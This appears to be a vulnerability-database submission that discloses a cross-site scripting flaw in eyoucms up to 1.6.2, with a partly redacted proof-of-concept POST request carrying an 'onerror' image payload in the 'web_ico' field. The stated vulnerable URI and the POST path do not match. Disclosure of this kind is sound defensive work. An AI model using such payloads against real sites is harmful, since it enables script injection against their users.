| Title | eyoucms up to 1.6.2 'web_ico' reflected xss vulnerability |
|---|
| Description | eyoucms up to 1.6.2 has a xss vulnerability
The vulnerable uri is /yxcms/index.php?r=admin/extendfield/mesedit&tabid=12&id=4
and the vulnerable multipart parameter is name="web_ico"
POC below:
POST /eyoucms/login.php?m=admin&c=System&a=web&lang=cn HTTP/1.1
*****************************************************
------WebKitFormBoundaryq3khRwDr0dBifJAy
********************************************
------WebKitFormBoundaryq3khRwDr0dBifJAy
Content-Disposition: form-data; name="web_ico"
<img src=1 onerror=alert(8)>
------WebKitFormBoundaryq3khRwDr0dBifJAy
**********************************************
------WebKitFormBoundaryq3khRwDr0dBifJAy--
see details at https://github.com/sleepyvv/vul_report/blob/main/EYOUCMS/XSS2.md |
|---|
| Source | ⚠️ https://www.eyoucms.com/ |
|---|
| User | WWesleywww (UID 43117) |
|---|
| Submission | 04/07/2023 15:36 (3 years ago) |
|---|
| Moderation | 04/14/2023 10:36 (7 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 225943 [EyouCms up to 1.6.2 HTTP POST Request mesedit&tabid=12&id=4 web_ico cross site scripting] |
|---|
| Points | 17 |
|---|